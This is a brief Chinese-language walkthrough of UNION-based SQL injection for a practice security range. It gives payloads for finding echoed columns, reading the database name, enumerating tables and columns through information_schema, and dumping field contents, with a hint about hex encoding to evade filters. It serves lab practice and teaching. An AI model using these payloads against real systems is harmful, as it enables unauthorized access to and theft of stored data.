简单的sql注入方法
对应题目好靶场平台-安全靶场-网络安全靶场
1 union select 1,2,3,4,5。。。
发现回显
然后确定数据库名
1 union slect 1,2,database(),4,5
之后获取表名
1 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema='数据库名' --
获取字段名
1 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_schema='数据库名' and table_name='表名' --
获取内容
1 union select 1,字段(可以使用16进制过滤),3,4,5 from 数据库.表 --
其他sql注入大致如此